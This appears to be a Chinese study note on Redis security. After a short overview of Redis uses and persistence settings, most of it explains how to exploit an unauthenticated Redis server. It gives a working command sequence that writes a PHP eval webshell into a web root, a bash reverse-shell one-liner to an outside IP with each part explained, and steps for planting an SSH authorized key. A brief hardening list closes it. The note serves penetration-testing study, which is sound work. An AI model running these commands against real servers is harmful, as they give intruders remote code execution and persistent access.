一、Redis相关知识
1、常见用途
缓存、分布式session、分布式锁、分布式全局ID、计数器、限流、列表、抽奖、标签、排行榜
2、Redis为什么这么流行?
(1)数据类型丰富,应用场景广泛
(2)纯内存的数据结构,读写速度快
(3)功能特性丰富(持久化、事务、pipeline、多语言支持、集群分布式)
3、Redis持久化机制
(1)RDB :Redis DataBase(默认)
(2)AOF :Append Only File
配置:
(1)save 3600 1#自动触发规则
(2)dbfilename dump.rdb #文件名
(3)dir ./ #存储路径
手动触发保存命令: save / bgsave
动态修改配置
config set:动态修改配置,重启以后失效
config set dir /www/admin/localhost_80/wwwroot
config set dbfilename redis.php
二、如何利用Redis实现攻击
1、webshell提权
前提:有HTTP服务器、知道文件保存路径、6379端口开放且无密码
redis-cli -h 192.168.142.66 -p 6379 #连接到6379端口(需要没有设置密码) config set dir /www/admin/localhost_80/wwwroot #修改存储路径 config set dbfilename redis.php #修改文件名(php后缀) set x " <?php @eval($_POST[cmd]); ?>" #任意值写入一句话木马 save #保存 #再用蚁剑连接即可
2、反弹连接
2.1、适用:
(1)在内网,只有私有IP
(2)IP动态变化
(3)6379端口不允许入方向
(4)—句话木马被杀软删除
2.2、实现:
1、监听端口
2、建立连接
(看机器有什么环境,通过命令直接连接,或者访问代码文件)
(*配合msf监听模块使用)
命令解析: bash -i >& /dev/tcp/192.168.142.44/7777 0>&1 bash -i ——打开交互式终端 /dev/tcp/192.168.142.44/7777 ——建立TCP远程连接 >&——将标准错误输出合并到标准输出中 0>&1——将标准输入重定向到标准输出中 标准输入(stdin):代码为0,使用<或<<; 标准输出(stdout):代码为1,使用>或>>; 标准错误输出(stderr):代码为2,使用2>或2>>
2.3、总结
流程
1、监听端口
2、执行命令,或者上传payload访问,建立连接
怎么上传?
1、文件上传漏洞
2、写入文件: MySQL、Redis、CMS
3、文本编辑命令: tee (vulnhub-breach). test.py (vulnh
ub-DC9)
怎么执行?
访问或者定时任务自动触发
2.4、Redis写入反弹连接任务
定时任务
Linux cron表达式
cron文件牛存储路径
3、SSH key免密登录
3.1、流程
1、客户端生成密钥对(公钥、私钥)
2、客户端把公钥发给服务端保存(正常情况需要密码)
3、客户端用私钥加密消息,发给服务端
4、服务端用公钥解密,解密成功,说明密钥匹配
5、客户端免密登录成功
3.2、Redis利用SSH Key提权流程
1、控制机连接到Redis
2、向$HOME/.ssh/authorized_keys写入公钥
3、ssh -i ./id_rsa user@IP 使用私钥免密登录
4、执行后续操作
三、Redis加固
1、限制访问IP
2、修改默认端口
3、使用密码访问
4、不要用root运行Redis